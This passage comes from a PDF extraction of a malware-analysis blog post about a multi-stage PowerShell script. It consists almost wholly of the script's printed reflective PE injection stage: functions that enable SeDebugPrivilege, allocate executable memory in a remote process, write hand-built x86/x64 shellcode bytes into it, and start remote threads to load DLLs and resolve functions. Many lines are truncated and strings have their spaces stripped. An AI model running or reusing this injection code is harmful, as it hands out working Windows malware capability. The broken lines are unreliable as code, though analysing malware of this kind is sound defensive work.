System.Runtime.InteropServices.HandleRef( $tmpPtr ,$Kern32Handle )\r\nWrite-Output   $GetProcAddress .Invoke( $null ,\r\n@( [System.Runtime.InteropServices.HandleRef] $HandleRef ,$Procedure ))\r\n}\r\nFunction   Enable-SeDebugPrivilege\r\n{\r\nParam (\r\n[ Parameter ( Position   =1,Mandatory   =$true )]\r\n[System.Object]\r\n$Win32Functions ,\r\n[ Parameter ( Position   =2,Mandatory   =$true )]\r\n[System.Object]\r\n$Win32Types ,\r\n[ Parameter ( Position   =3,Mandatory   =$true )]\r\n[System.Object]\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 19 of 57\n\n$Win32Constants\r\n)\r\n[IntPtr] $ThreadHandle   =$Win32Functions .GetCurrentThread.Invoke()\r\nif   ( $ThreadHandle   -eq   [IntPtr] ::Zero)\r\n{\r\nThrow\"Unabletogetthehandletothecurrentthread\"\r\n}\r\n[IntPtr] $ThreadToken   =[IntPtr] ::Zero\r\n[Bool] $Result   =$Win32Functions .OpenThreadToken.Invoke( $ThreadHandle ,$Win32Constants .TOKEN_QUERY-\r\nbor   $Win32Constants .TOKEN_ADJUST_PRIVILEGES,$false ,[Ref] $ThreadToken )\r\nif   ( $Result   -eq   $false )\r\n{\r\n$ErrorCode   =[System.Runtime.InteropServices.Marshal] ::GetLastWin32Error()\r\nif   ( $ErrorCode   -eq   $Win32Constants .ERROR_NO_TOKEN)\r\n{\r\n$Result   =$Win32Functions .ImpersonateSelf.Invoke(3)\r\nif   ( $Result   -eq   $false )\r\n{\r\nThrow\"Unabletoimpersonateself\"\r\n}\r\n$Result   =$Win32Functions .OpenThreadToken.Invoke( $ThreadHandle ,$Win32Constants .TOKEN_QUERY-\r\nbor   $Win32Constants .TOKEN_ADJUST_PRIVILEGES,$false ,[Ref] $ThreadToken )\r\nif   ( $Result   -eq   $false )\r\n{\r\nThrow\"UnabletoOpenThreadToken.\"\r\n}\r\n}\r\nelse\r\n{\r\nThrow\"UnabletoOpenThreadToken.Errorcode:$ErrorCode\"\r\n}\r\n}\r\n[IntPtr] $PLuid   =[System.Runtime.InteropServices.Marshal] ::AllocHGlobal( [System.Runtime.InteropServices.Marshal] ::SizeOf( [T\r\n$Result   =$Win32Functions .LookupPrivilegeValue.Invoke( $null ,\"SeDebugPrivilege\" ,$PLuid )\r\nif   ( $Result   -eq   $false )\r\n{\r\nThrow\"UnabletocallLookupPrivilegeValue\"\r\n}\r\n[UInt32] $TokenPrivSize   =[System.Runtime.InteropServices.Marshal] ::SizeOf( [Type] $Win32Types .TOKEN_PRIVILEGES)\r\n[IntPtr] $TokenPrivilegesMem   =[System.Runtime.InteropServices.Marshal] ::AllocHGlobal( $TokenPrivSize )\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 20 of 57\n\n$TokenPrivileges   =\r\n[System.Runtime.InteropServices.Marshal] ::PtrToStructure( $TokenPrivilegesMem ,[Type] $Win32Types .TOKEN_\r\n$TokenPrivileges .PrivilegeCount=1\r\n$TokenPrivileges .Privileges.Luid=[System.Runtime.InteropServices.Marshal] ::PtrToStructure( $PLuid ,[Type] $Win32Types .LUI\r\n$TokenPrivileges .Privileges.Attributes=$Win32Constants .SE_PRIVILEGE_ENABLED\r\n[System.Runtime.InteropServices.Marshal] ::StructureToPtr( $TokenPrivileges ,$TokenPrivilegesMem ,$true )\r\n$Result   =$Win32Functions .AdjustTokenPrivileges.Invoke( $ThreadToken ,$false ,$TokenPrivilegesMem ,$TokenPrivSize ,\r\n$ErrorCode   =[System.Runtime.InteropServices.Marshal] ::GetLastWin32Error()\r\nif   (( $Result   -eq   $false )-or   ( $ErrorCode   -ne   0))\r\n{\r\n}\r\n[System.Runtime.InteropServices.Marshal] ::FreeHGlobal( $TokenPrivilegesMem )\r\n}\r\nFunction   Invoke-CreateRemoteThread\r\n{\r\nParam (\r\n[ Parameter ( Position   =1,Mandatory   =$true )]\r\n[IntPtr]\r\n$ProcessHandle ,\r\n[ Parameter ( Position   =2,Mandatory   =$true )]\r\n[IntPtr]\r\n$StartAddress ,\r\n[ Parameter ( Position   =3,Mandatory   =$false )]\r\n[IntPtr]\r\n$ArgumentPtr   =[IntPtr] ::Zero,\r\n[ Parameter ( Position   =4,Mandatory   =$true )]\r\n[System.Object]\r\n$Win32Functions\r\n)\r\n[IntPtr] $RemoteThreadHandle   =[IntPtr] ::Zero\r\n$OSVersion   =[Environment] ::OSVersion.Version\r\nif   (( $OSVersion   -ge   ( New-Object   'Version'   6,0))-and   ( $OSVersion   -lt   ( New-Object   'Version'   6,2)))\r\n{\r\n$RetVal =$Win32Functions .NtCreateThreadEx.Invoke( [Ref] $RemoteThreadHandle ,0x1FFFFF,[IntPtr] ::Zero,$ProcessHandle ,\r\n$LastError   =[System.Runtime.InteropServices.Marshal] ::GetLastWin32Error()\r\nif   ( $RemoteThreadHandle   -eq   [IntPtr] ::Zero)\r\n{\r\nThrow\"ErrorinNtCreateThreadEx.Returnvalue:$RetVal.LastError:$LastError\"\r\n}\r\n}\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 21 of 57\n\nelse\r\n{\r\n$RemoteThreadHandle   =$Win32Functions .CreateRemoteThread.Invoke( $ProcessHandle ,[IntPtr] ::Zero,[UIntPtr]\r\n[UInt64] 0xFFFF,$StartAddress ,$ArgumentPtr ,0,[IntPtr] ::Zero)\r\n}\r\nif   ( $RemoteThreadHandle   -eq   [IntPtr] ::Zero)\r\n{\r\n}\r\nreturn   $RemoteThreadHandle\r\n}\r\nFunction   Get-ImageNtHeaders\r\n{\r\nParam (\r\n[ Parameter ( Position   =0,Mandatory   =$true )]\r\n[IntPtr]\r\n$PEHandle ,\r\n[ Parameter ( Position   =1,Mandatory   =$true )]\r\n[System.Object]\r\n$Win32Types\r\n)\r\n$NtHeadersInfo   =New-Object   System.Object\r\n$dosHeader   =[System.Runtime.InteropServices.Marshal] ::PtrToStructure( $PEHandle ,[Type] $Win32Types .IMAGE_DOS_HEADER)\r\n[IntPtr] $NtHeadersPtr   =[IntPtr] ( Add-SignedIntAsUnsigned   ( [Int64] $PEHandle )( [Int64]\r\n[UInt64] $dosHeader .e_lfanew))\r\n$NtHeadersInfo   |Add-Member   -MemberTypeNoteProperty-NameNtHeadersPtr-Value$NtHeadersPtr\r\n$imageNtHeaders64   =[System.Runtime.InteropServices.Marshal] ::PtrToStructure( $NtHeadersPtr ,[Type] $Win32Types .IMAGE_NT_HEA\r\nif   ( $imageNtHeaders64 .Signature-ne   0x00004550)\r\n{\r\nthrow\"InvalidIMAGE_NT_HEADERsignature.\"\r\n}\r\nif   ( $imageNtHeaders64 .OptionalHeader.Magic-eq   'IMAGE_NT_OPTIONAL_HDR64_MAGIC' )\r\n{\r\n$NtHeadersInfo   |Add-Member   -MemberTypeNoteProperty-NameIMAGE_NT_HEADERS-Value$imageNtHeaders64\r\n$NtHeadersInfo   |Add-Member   -MemberTypeNoteProperty-NamePE64Bit-Value$true\r\n}\r\nelse\r\n{\r\n$ImageNtHeaders32   =[System.Runtime.InteropServices.Marshal] ::PtrToStructure( $NtHeadersPtr ,[Type] $Win32Types .IMAGE_NT_HEA\r\n$NtHeadersInfo   |Add-Member   -MemberTypeNoteProperty-NameIMAGE_NT_HEADERS-Value$imageNtHeaders32\r\n$NtHeadersInfo   |Add-Member   -MemberTypeNoteProperty-NamePE64Bit-Value$false\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 22 of 57\n\n}\r\nreturn   $NtHeadersInfo\r\n}\r\nFunction   Get-PEBasicInfo\r\n{\r\nParam (\r\n[ Parameter (Position   =0,Mandatory   =$true   )]\r\n[Byte[]]\r\n$PEBytes ,\r\n[ Parameter ( Position   =1,Mandatory   =$true )]\r\n[System.Object]\r\n$Win32Types\r\n)\r\n$PEInfo   =New-Object   System.Object\r\n[IntPtr] $UnmanagedPEBytes   =[System.Runtime.InteropServices.Marshal] ::AllocHGlobal( $PEBytes .Length)\r\n[System.Runtime.InteropServices.Marshal] ::Copy( $PEBytes ,0,$UnmanagedPEBytes ,$PEBytes .Length)|\r\nOut-Null\r\n$NtHeadersInfo   =Get-ImageNtHeaders   -PEHandle$UnmanagedPEBytes   -Win32Types$Win32Types\r\n$PEInfo   |Add-Member   -MemberTypeNoteProperty-Name'PE64Bit'   -Value( $NtHeadersInfo .PE64Bit)\r\n$PEInfo   |Add-Member   -MemberTypeNoteProperty-Name'OriginalImageBase'   -\r\nValue( $NtHeadersInfo .IMAGE_NT_HEADERS.OptionalHeader.ImageBase)\r\n$PEInfo   |Add-Member   -MemberTypeNoteProperty-Name'SizeOfImage'   -\r\nValue( $NtHeadersInfo .IMAGE_NT_HEADERS.OptionalHeader.SizeOfImage)\r\n$PEInfo   |Add-Member   -MemberTypeNoteProperty-Name'SizeOfHeaders'   -\r\nValue( $NtHeadersInfo .IMAGE_NT_HEADERS.OptionalHeader.SizeOfHeaders)\r\n$PEInfo   |Add-Member   -MemberTypeNoteProperty-Name'DllCharacteristics'   -\r\nValue( $NtHeadersInfo .IMAGE_NT_HEADERS.OptionalHeader.DllCharacteristics)\r\n[System.Runtime.InteropServices.Marshal] ::FreeHGlobal( $UnmanagedPEBytes )\r\nreturn   $PEInfo\r\n}\r\nFunction   Get-PEDetailedInfo\r\n{\r\nParam (\r\n[ Parameter (Position   =0,Mandatory   =$true )]\r\n[IntPtr]\r\n$PEHandle ,\r\n[ Parameter ( Position   =1,Mandatory   =$true )]\r\n[System.Object]\r\n$Win32Types ,\r\n[ Parameter ( Position   =2,Mandatory   =$true )]\r\n[System.Object]\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 23 of 57\n\n$Win32Constants\r\n)\r\nif   ( $PEHandle   -eq   $null   -or   $PEHandle   -eq   [IntPtr] ::Zero)\r\n{\r\nthrow'PEHandleisnullorIntPtr.Zero'\r\n}\r\n$PEInfo   =New-Object   System.Object\r\n$NtHeadersInfo   =Get-ImageNtHeaders   -PEHandle$PEHandle   -Win32Types$Win32Types\r\n$PEInfo   |Add-Member   -MemberTypeNoteProperty-NamePEHandle-Value$PEHandle\r\n$PEInfo   |Add-Member   -MemberTypeNoteProperty-NameIMAGE_NT_HEADERS-\r\nValue( $NtHeadersInfo .IMAGE_NT_HEADERS)\r\n$PEInfo   |Add-Member   -MemberTypeNoteProperty-NameNtHeadersPtr-\r\nValue( $NtHeadersInfo .NtHeadersPtr)\r\n$PEInfo   |Add-Member   -MemberTypeNoteProperty-NamePE64Bit-Value( $NtHeadersInfo .PE64Bit)\r\n$PEInfo   |Add-Member   -MemberTypeNoteProperty-Name'SizeOfImage'   -\r\nValue( $NtHeadersInfo .IMAGE_NT_HEADERS.OptionalHeader.SizeOfImage)\r\nif   ( $PEInfo .PE64Bit-eq   $true )\r\n{\r\n[IntPtr] $SectionHeaderPtr   =[IntPtr] ( Add-SignedIntAsUnsigned   ( [Int64] $PEInfo .NtHeadersPtr)\r\n( [System.Runtime.InteropServices.Marshal] ::SizeOf( [Type] $Win32Types .IMA\r\n$PEInfo   |Add-Member   -MemberTypeNoteProperty-NameSectionHeaderPtr-Value$SectionHeaderPtr\r\n}\r\nelse\r\n{\r\n[IntPtr] $SectionHeaderPtr   =[IntPtr] ( Add-SignedIntAsUnsigned   ( [Int64] $PEInfo .NtHeadersPtr)\r\n( [System.Runtime.InteropServices.Marshal] ::SizeOf( [Type] $Win32Types .IMA\r\n$PEInfo   |Add-Member   -MemberTypeNoteProperty-NameSectionHeaderPtr-Value$SectionHeaderPtr\r\n}\r\nif   (( $NtHeadersInfo .IMAGE_NT_HEADERS.FileHeader.Characteristics-\r\nband   $Win32Constants .IMAGE_FILE_DLL)-eq   $Win32Constants .IMAGE_FILE_DLL)\r\n{\r\n$PEInfo   |Add-Member   -MemberTypeNoteProperty-NameFileType-Value'DLL'\r\n}\r\nelseif   (( $NtHeadersInfo .IMAGE_NT_HEADERS.FileHeader.Characteristics-\r\nband   $Win32Constants .IMAGE_FILE_EXECUTABLE_IMAGE)-eq   $Win32Constants .IMAGE_FILE_EXECUTABLE_IMAGE)\r\n{\r\n$PEInfo   |Add-Member   -MemberTypeNoteProperty-NameFileType-Value'EXE'\r\n}\r\nelse\r\n{\r\nThrow\"PEfileisnotanEXEorDLL\"\r\n}\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 24 of 57\n\nreturn   $PEInfo\r\n}\r\nFunction   Import-DllInRemoteProcess\r\n{\r\nParam (\r\n[ Parameter ( Position =0,Mandatory = $true )]\r\n[IntPtr]\r\n$RemoteProcHandle ,\r\n[ Parameter ( Position =1,Mandatory = $true )]\r\n[IntPtr]\r\n$ImportDllPathPtr\r\n)\r\n$PtrSize   =[System.Runtime.InteropServices.Marshal] ::SizeOf( [Type][IntPtr] )\r\n$ImportDllPath   =[System.Runtime.InteropServices.Marshal] ::PtrToStringAnsi( $ImportDllPathPtr )\r\n$DllPathSize   =[UIntPtr][UInt64] ( [UInt64] $ImportDllPath .Length+1)\r\n$RImportDllPathPtr   =$Win32Functions .VirtualAllocEx.Invoke( $RemoteProcHandle ,[IntPtr] ::Zero,$DllPathSize ,$Win32Cons\r\nbor   $Win32Constants .MEM_RESERVE,$Win32Constants .PAGE_READWRITE)\r\nif   ( $RImportDllPathPtr   -eq   [IntPtr] ::Zero)\r\n{\r\nThrow\"Unabletoallocatememoryintheremoteprocess\"\r\n}\r\n[UIntPtr] $NumBytesWritten   =[UIntPtr] ::Zero\r\n$Success   =$Win32Functions .WriteProcessMemory.Invoke( $RemoteProcHandle ,$RImportDllPathPtr ,$ImportDllPathPtr ,$DllPat\r\nif   ( $Success   -eq   $false )\r\n{\r\nThrow\"UnabletowriteDLLpathtoremoteprocessmemory\"\r\n}\r\nif   ( $DllPathSize   -ne   $NumBytesWritten )\r\n{\r\nThrow\"Didn'twritetheexpectedamountofbyteswhenwritingaDLLpathtoloadtotheremoteprocess\"\r\n}\r\n$Kernel32Handle   =$Win32Functions .GetModuleHandle.Invoke( \"kernel32.dll\" )\r\n$LoadLibraryAAddr   =$Win32Functions .GetProcAddress.Invoke( $Kernel32Handle ,\"LoadLibraryA\" )\r\n[IntPtr] $DllAddress   =[IntPtr] ::Zero\r\nif   ( $PEInfo .PE64Bit-eq   $true )\r\n{\r\n$LoadLibraryARetMem   =$Win32Functions .VirtualAllocEx.Invoke( $RemoteProcHandle ,[IntPtr] ::Zero,$DllPathSize ,$Win32Con\r\nbor   $Win32Constants .MEM_RESERVE,$Win32Constants .PAGE_READWRITE)\r\nif   ( $LoadLibraryARetMem   -eq   [IntPtr] ::Zero)\r\n{\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 25 of 57\n\nThrow\r\n\"UnabletoallocatememoryintheremoteprocessforthereturnvalueofLoadLibraryA\"\r\n}\r\n$LoadLibrarySC1   =@(0x53,0x48,0x89,0xe3,0x48,0x83,0xec,0x20,0x66,0x83,0xe4,0xc0,0x48,0xb9)\r\n$LoadLibrarySC2   =@(0x48,0xba)\r\n$LoadLibrarySC3   =@(0xff,0xd2,0x48,0xba)\r\n$LoadLibrarySC4   =@(0x48,0x89,0x02,0x48,0x89,0xdc,0x5b,0xc3)\r\n$SCLength   =$LoadLibrarySC1 .Length+$LoadLibrarySC2 .Length+$LoadLibrarySC3 .Length+$LoadLibrarySC4 .Length+( $PtrS\r\n$SCPSMem   =[System.Runtime.InteropServices.Marshal] ::AllocHGlobal( $SCLength )\r\n$SCPSMemOriginal   =$SCPSMem\r\nWrite-BytesToMemory   -Bytes$LoadLibrarySC1   -MemoryAddress$SCPSMem\r\n$SCPSMem   =Add-SignedIntAsUnsigned   $SCPSMem   ( $LoadLibrarySC1 .Length)\r\n[System.Runtime.InteropServices.Marshal] ::StructureToPtr( $RImportDllPathPtr ,$SCPSMem ,$false )\r\n$SCPSMem   =Add-SignedIntAsUnsigned   $SCPSMem   ( $PtrSize )\r\nWrite-BytesToMemory   -Bytes$LoadLibrarySC2   -MemoryAddress$SCPSMem\r\n$SCPSMem   =Add-SignedIntAsUnsigned   $SCPSMem   ( $LoadLibrarySC2 .Length)\r\n[System.Runtime.InteropServices.Marshal] ::StructureToPtr( $LoadLibraryAAddr ,$SCPSMem ,$false )\r\n$SCPSMem   =Add-SignedIntAsUnsigned   $SCPSMem   ( $PtrSize )\r\nWrite-BytesToMemory   -Bytes$LoadLibrarySC3   -MemoryAddress$SCPSMem\r\n$SCPSMem   =Add-SignedIntAsUnsigned   $SCPSMem   ( $LoadLibrarySC3 .Length)\r\n[System.Runtime.InteropServices.Marshal] ::StructureToPtr( $LoadLibraryARetMem ,$SCPSMem ,$false )\r\n$SCPSMem   =Add-SignedIntAsUnsigned   $SCPSMem   ( $PtrSize )\r\nWrite-BytesToMemory   -Bytes$LoadLibrarySC4   -MemoryAddress$SCPSMem\r\n$SCPSMem   =Add-SignedIntAsUnsigned   $SCPSMem   ( $LoadLibrarySC4 .Length)\r\n$RSCAddr   =$Win32Functions .VirtualAllocEx.Invoke( $RemoteProcHandle ,[IntPtr] ::Zero,[UIntPtr]\r\n[UInt64] $SCLength ,$Win32Constants .MEM_COMMIT-\r\nbor   $Win32Constants .MEM_RESERVE,$Win32Constants .PAGE_EXECUTE_READWRITE)\r\nif   ( $RSCAddr   -eq   [IntPtr] ::Zero)\r\n{\r\nThrow\"Unabletoallocatememoryintheremoteprocessforshellcode\"\r\n}\r\n$Success   =$Win32Functions .WriteProcessMemory.Invoke( $RemoteProcHandle ,$RSCAddr ,$SCPSMemOriginal ,[UIntPtr]\r\n[UInt64] $SCLength ,[Ref] $NumBytesWritten )\r\nif   (( $Success   -eq   $false )-or   ( [UInt64] $NumBytesWritten   -ne   [UInt64] $SCLength ))\r\n{\r\nThrow\"Unabletowriteshellcodetoremoteprocessmemory.\"\r\n}\r\n$RThreadHandle   =Invoke-CreateRemoteThread   -ProcessHandle$RemoteProcHandle   -\r\nStartAddress$RSCAddr   -Win32Functions$Win32Functions\r\n$Result   =$Win32Functions .WaitForSingleObject.Invoke( $RThreadHandle ,20000)\r\nif   ( $Result   -ne   0)\r\n{\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 26 of 57\n\nThrow\r\n\"CalltoCreateRemoteThreadtocallGetProcAddressfailed.\"\r\n}\r\n[IntPtr] $ReturnValMem   =[System.Runtime.InteropServices.Marshal] ::AllocHGlobal( $PtrSize )\r\n$Result   =$Win32Functions .ReadProcessMemory.Invoke( $RemoteProcHandle ,$LoadLibraryARetMem ,$ReturnValMem ,[UIntPtr]\r\n[UInt64] $PtrSize ,[Ref] $NumBytesWritten )\r\nif   ( $Result   -eq   $false )\r\n{\r\nThrow\"CalltoReadProcessMemoryfailed\"\r\n}\r\n[IntPtr] $DllAddress   =[System.Runtime.InteropServices.Marshal] ::PtrToStructure( $ReturnValMem ,[Type]\r\n[IntPtr] )\r\n$Win32Functions .VirtualFreeEx.Invoke( $RemoteProcHandle ,$LoadLibraryARetMem ,[UIntPtr]\r\n[UInt64] 0,$Win32Constants .MEM_RELEASE)|Out-Null\r\n$Win32Functions .VirtualFreeEx.Invoke( $RemoteProcHandle ,$RSCAddr ,[UIntPtr]\r\n[UInt64] 0,$Win32Constants .MEM_RELEASE)|Out-Null\r\n}\r\nelse\r\n{\r\n[IntPtr] $RThreadHandle   =Invoke-CreateRemoteThread   -ProcessHandle$RemoteProcHandle   -\r\nStartAddress$LoadLibraryAAddr   -ArgumentPtr$RImportDllPathPtr   -Win32Functions$Win32Functions\r\n$Result   =$Win32Functions .WaitForSingleObject.Invoke( $RThreadHandle ,20000)\r\nif   ( $Result   -ne   0)\r\n{\r\nThrow\"CalltoCreateRemoteThreadtocallGetProcAddressfailed.\"\r\n}\r\n[Int32] $ExitCode   =0\r\n$Result   =$Win32Functions .GetExitCodeThread.Invoke( $RThreadHandle ,[Ref] $ExitCode )\r\nif   (( $Result   -eq   0)-or   ( $ExitCode   -eq   0))\r\n{\r\nThrow\"CalltoGetExitCodeThreadfailed\"\r\n}\r\n[IntPtr] $DllAddress   =[IntPtr] $ExitCode\r\n}\r\n$Win32Functions .VirtualFreeEx.Invoke( $RemoteProcHandle ,$RImportDllPathPtr ,[UIntPtr]\r\n[UInt64] 0,$Win32Constants .MEM_RELEASE)|Out-Null\r\nreturn   $DllAddress\r\n}\r\nFunction   Get-RemoteProcAddress\r\n{\r\nParam (\r\n[ Parameter ( Position =0,Mandatory = $true )]\r\n[IntPtr]\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 27 of 57\n\n$RemoteProcHandle ,\r\n[ Parameter ( Position =1,Mandatory = $true )]\r\n[IntPtr]\r\n$RemoteDllHandle ,\r\n[ Parameter ( Position =2,Mandatory = $true )]\r\n[String]\r\n$FunctionName\r\n)\r\n$PtrSize   =[System.Runtime.InteropServices.Marshal] ::SizeOf( [Type][IntPtr] )\r\n$FunctionNamePtr   =[System.Runtime.InteropServices.Marshal] ::StringToHGlobalAnsi( $FunctionName )\r\n$FunctionNameSize   =[UIntPtr][UInt64] ( [UInt64] $FunctionName .Length+1)\r\n$RFuncNamePtr   =$Win32Functions .VirtualAllocEx.Invoke( $RemoteProcHandle ,[IntPtr] ::Zero,$FunctionNameSize ,$Win32Cons\r\nbor   $Win32Constants .MEM_RESERVE,$Win32Constants .PAGE_READWRITE)\r\nif   ( $RFuncNamePtr   -eq   [IntPtr] ::Zero)\r\n{\r\nThrow\"Unabletoallocatememoryintheremoteprocess\"\r\n}\r\n[UIntPtr] $NumBytesWritten   =[UIntPtr] ::Zero\r\n$Success   =$Win32Functions .WriteProcessMemory.Invoke( $RemoteProcHandle ,$RFuncNamePtr ,$FunctionNamePtr ,$FunctionName\r\n[System.Runtime.InteropServices.Marshal] ::FreeHGlobal( $FunctionNamePtr )\r\nif   ( $Success   -eq   $false )\r\n{\r\nThrow\"UnabletowriteDLLpathtoremoteprocessmemory\"\r\n}\r\nif   ( $FunctionNameSize   -ne   $NumBytesWritten )\r\n{\r\nThrow\"Didn'twritetheexpectedamountofbyteswhenwritingaDLLpathtoloadtotheremoteprocess\"\r\n}\r\n$Kernel32Handle   =$Win32Functions .GetModuleHandle.Invoke( \"kernel32.dll\" )\r\n$GetProcAddressAddr   =$Win32Functions .GetProcAddress.Invoke( $Kernel32Handle ,\"GetProcAddress\" )\r\n$GetProcAddressRetMem   =$Win32Functions .VirtualAllocEx.Invoke( $RemoteProcHandle ,[IntPtr] ::Zero,[UInt64]\r\n[UInt64] $PtrSize ,$Win32Constants .MEM_COMMIT-\r\nbor   $Win32Constants .MEM_RESERVE,$Win32Constants .PAGE_READWRITE)\r\nif   ( $GetProcAddressRetMem   -eq   [IntPtr] ::Zero)\r\n{\r\nThrow\"UnabletoallocatememoryintheremoteprocessforthereturnvalueofGetProcAddress\"\r\n}\r\n[Byte[]] $GetProcAddressSC   =@()\r\nif   ( $PEInfo .PE64Bit-eq   $true )\r\n{\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 28 of 57\n\n$GetProcAddressSC1   =\r\n@(0x53,0x48,0x89,0xe3,0x48,0x83,0xec,0x20,0x66,0x83,0xe4,0xc0,0x48,0xb9)\r\n$GetProcAddressSC2   =@(0x48,0xba)\r\n$GetProcAddressSC3   =@(0x48,0xb8)\r\n$GetProcAddressSC4   =@(0xff,0xd0,0x48,0xb9)\r\n$GetProcAddressSC5   =@(0x48,0x89,0x01,0x48,0x89,0xdc,0x5b,0xc3)\r\n}\r\nelse\r\n{\r\n$GetProcAddressSC1   =@(0x53,0x89,0xe3,0x83,0xe4,0xc0,0xb8)\r\n$GetProcAddressSC2   =@(0xb9)\r\n$GetProcAddressSC3   =@(0x51,0x50,0xb8)\r\n$GetProcAddressSC4   =@(0xff,0xd0,0xb9)\r\n$GetProcAddressSC5   =@(0x89,0x01,0x89,0xdc,0x5b,0xc3)\r\n}\r\n$SCLength   =$GetProcAddressSC1 .Length+$GetProcAddressSC2 .Length+$GetProcAddressSC3 .Length+$GetProcAddressSC4 .Lengt\r\n$SCPSMem   =[System.Runtime.InteropServices.Marshal] ::AllocHGlobal( $SCLength )\r\n$SCPSMemOriginal   =$SCPSMem\r\nWrite-BytesToMemory   -Bytes$GetProcAddressSC1   -MemoryAddress$SCPSMem\r\n$SCPSMem   =Add-SignedIntAsUnsigned   $SCPSMem   ( $GetProcAddressSC1 .Length)\r\n[System.Runtime.InteropServices.Marshal] ::StructureToPtr( $RemoteDllHandle ,$SCPSMem ,$false )\r\n$SCPSMem   =Add-SignedIntAsUnsigned   $SCPSMem   ( $PtrSize )\r\nWrite-BytesToMemory   -Bytes$GetProcAddressSC2   -MemoryAddress$SCPSMem\r\n$SCPSMem   =Add-SignedIntAsUnsigned   $SCPSMem   ( $GetProcAddressSC2 .Length)\r\n[System.Runtime.InteropServices.Marshal] ::StructureToPtr( $RFuncNamePtr ,$SCPSMem ,$false )\r\n$SCPSMem   =Add-SignedIntAsUnsigned   $SCPSMem   ( $PtrSize )\r\nWrite-BytesToMemory   -Bytes$GetProcAddressSC3   -MemoryAddress$SCPSMem\r\n$SCPSMem   =Add-SignedIntAsUnsigned   $SCPSMem   ( $GetProcAddressSC3 .Length)\r\n[System.Runtime.InteropServices.Marshal] ::StructureToPtr( $GetProcAddressAddr ,$SCPSMem ,$false )\r\n$SCPSMem   =Add-SignedIntAsUnsigned   $SCPSMem   ( $PtrSize )\r\nWrite-BytesToMemory   -Bytes$GetProcAddressSC4   -MemoryAddress$SCPSMem\r\n$SCPSMem   =Add-SignedIntAsUnsigned   $SCPSMem   ( $GetProcAddressSC4 .Length)\r\n[System.Runtime.InteropServices.Marshal] ::StructureToPtr( $GetProcAddressRetMem ,$SCPSMem ,$false )\r\n$SCPSMem   =Add-SignedIntAsUnsigned   $SCPSMem   ( $PtrSize )\r\nWrite-BytesToMemory   -Bytes$GetProcAddressSC5   -MemoryAddress$SCPSMem\r\n$SCPSMem   =Add-SignedIntAsUnsigned   $SCPSMem   ( $GetProcAddressSC5 .Length)\r\n$RSCAddr   =$Win32Functions .VirtualAllocEx.Invoke( $RemoteProcHandle ,[IntPtr] ::Zero,[UIntPtr]\r\n[UInt64] $SCLength ,$Win32Constants .MEM_COMMIT-\r\nbor   $Win32Constants .MEM_RESERVE,$Win32Constants .PAGE_EXECUTE_READWRITE)\r\nif   ( $RSCAddr   -eq   [IntPtr] ::Zero)\r\n{\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 29 of 57\n\nThrow\r\n\"Unabletoallocatememoryintheremoteprocessforshellcode\"\r\n}\r\n$Success   =$Win32Functions .WriteProcessMemory.Invoke( $RemoteProcHandle ,$RSCAddr ,$SCPSMemOriginal ,[UIntPtr]\r\n[UInt64] $SCLength ,[Ref] $NumBytesWritten )\r\nif   (( $Success   -eq   $false )-or   ( [UInt64] $NumBytesWritten   -ne   [UInt64] $SCLength ))\r\n{\r\nThrow\"Unabletowriteshellcodetoremoteprocessmemory.\"\r\n}\r\n$RThreadHandle   =Invoke-CreateRemoteThread   -ProcessHandle$RemoteProcHandle   -\r\nStartAddress$RSCAddr   -Win32Functions$Win32Functions\r\n$Result   =$Win32Functions .WaitForSingleObject.Invoke( $RThreadHandle ,20000)\r\nif   ( $Result   -ne   0)\r\n{\r\nThrow\"CalltoCreateRemoteThreadtocallGetProcAddressfailed.\"\r\n}\r\n[IntPtr] $ReturnValMem   =[System.Runtime.InteropServices.Marshal] ::AllocHGlobal( $PtrSize )\r\n$Result   =$Win32Functions .ReadProcessMemory.Invoke( $RemoteProcHandle ,$GetProcAddressRetMem ,$ReturnValMem ,[UIntPtr]\r\n[UInt64] $PtrSize ,[Ref] $NumBytesWritten )\r\nif   (( $Result   -eq   $false )-or   ( $NumBytesWritten   -eq   0))\r\n{\r\nThrow\"CalltoReadProcessMemoryfailed\"\r\n}\r\n[IntPtr] $ProcAddress   =[System.Runtime.InteropServices.Marshal] ::PtrToStructure( $ReturnValMem ,[Type]\r\n[IntPtr] )\r\n$Win32Functions .VirtualFreeEx.Invoke( $RemoteProcHandle ,$RSCAddr ,[UIntPtr]\r\n[UInt64] 0,$Win32Constants .MEM_RELEASE)|Out-Null\r\n$Win32Functions .VirtualFreeEx.Invoke( $RemoteProcHandle ,$RFuncNamePtr ,[UIntPtr]\r\n[UInt64] 0,$Win32Constants .MEM_RELEASE)|Out-Null\r\n$Win32Functions .VirtualFreeEx.Invoke( $RemoteProcHandle ,$GetProcAddressRetMem ,[UIntPtr]\r\n[UInt64] 0,$Win32Constants .MEM_RELEASE)|Out-Null\r\nreturn   $ProcAddress\r\n}\r\nFunction   Copy-Sections\r\n{\r\nParam (\r\n[ Parameter ( Position   =0,Mandatory   =$true )]\r\n[Byte[]]\r\n$PEBytes ,\r\n[ Parameter ( Position   =1,Mandatory   =$true )]\r\n[System.Object]\r\n$PEInfo ,\r\n[ Parameter ( Position   =2,Mandatory   =$true )]\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 30 of 57\n\n[System.Object]\r\n$Win32Functions ,\r\n[ Parameter ( Position   =3,Mandatory   =$true )]\r\n[System.Object]\r\n$Win32Types\r\n)\r\nfor ($i   =0;$i   -lt   $PEInfo .IMAGE_NT_HEADERS.FileHeader.NumberOfSections;$i ++)\r\n{\r\n[IntPtr] $SectionHeaderPtr   =[IntPtr] ( Add-SignedIntAsUnsigned   ( [Int64] $PEInfo .SectionHeaderPtr)\r\n( $i   